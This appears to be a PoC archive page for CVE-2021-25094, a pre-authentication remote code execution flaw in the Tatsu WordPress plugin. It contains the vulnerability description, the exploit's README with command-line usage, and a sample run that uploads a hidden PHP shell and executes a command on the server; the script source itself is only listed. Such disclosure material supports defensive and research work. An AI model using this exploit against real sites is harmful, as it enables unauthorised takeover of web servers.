Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2021-25094 PoC — Tatsu < 3.3.12 - Unauthenticated RCE

Source
https://github.com/darkpills/CVE-2021-25094-tatsu-preauth-rce
Associated Vulnerability
Title:Tatsu < 3.3.12 - Unauthenticated RCE (CVE-2021-25094)
Description:The Tatsu WordPress plugin before 3.3.12 add_custom_font action can be used without prior authentication to upload a rogue zip file which is uncompressed under the WordPress's upload directory. By adding a PHP shell with a filename starting with a dot ".", this can bypass extension control implemented in the plugin. Moreover, there is a race condition in the zip extraction process which makes the shell file live long enough on the filesystem to be callable by an attacker.
Readme
# Preauth RCE in Tatsu builder Wordpress plugin (CVE-2021-25094)

Simple PoC of an unauthenticated RCE in Tatsu Builder <= 3.3.11 provided as an example.

Full write-up here: https://darkpills.com/wordpress-tatsu-builder-preauth-rce-cve-2021-25094/

Usage:
```
python3 exploit-rce.py [-h] [--technique TECHNIQUE] [--customShell CUSTOMSHELL] [--keep KEEP] [--proxy PROXY] [--compressionLevel COMPRESSIONLEVEL] url cmd

positional arguments:
  url                   Wordpress vulnerable URL (example: https://mywordpress.com/)
  cmd                   OS command to execute

optional arguments:
  -h, --help            show this help message and exit
  --technique TECHNIQUE
                        Shell technique: php | htaccess | custom
  --customShell CUSTOMSHELL
                        Provide a custom PHP shell file that will take a base64 cmd as $_POST['text'] input
  --keep KEEP           Do not auto-destruct the uploaded PHP shell
  --proxy PROXY         Specify and use an HTTP proxy (example: http://localhost:8080)
  --compressionLevel COMPRESSIONLEVEL
                        Compression level of the zip file (0 to 9, default 9)
```

Example:
```
└─$ python3 exploit-rce.py http://wordpress/ id
|=== Tatsudo: pre-auth RCE exploit for Tatsu wordpress plugin <= 3.3.11
|=== CVE-2021-25094 / Vincent MICHEL (@darkpills)

[+] Generating a zip with shell technique 'php'
[+] Uploading zip archive to http://wordpress//wp-admin/admin-ajax.php?action=add_custom_font
[+] Upload OK
[+] Trigger shell at http://wordpress/wp-content/uploads/typehub/custom/hjf/.bfzwt.php
[+] Exploit success!
uid=33(www-data) gid=33(www-data) groups=33(www-data)

[+] Shell file has been auto-deleted but parent directory will remain on the webserver
[+] Job done
```
File Snapshot

 [4.0K]  /data/pocs/55bd64aeb65fa8b29f9b62539bea193a95ee904f
├── [6.5K]  exploit-race.py
├── [6.1K]  exploit-rce.py
└── [1.7K]  README.md

0 directories, 3 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →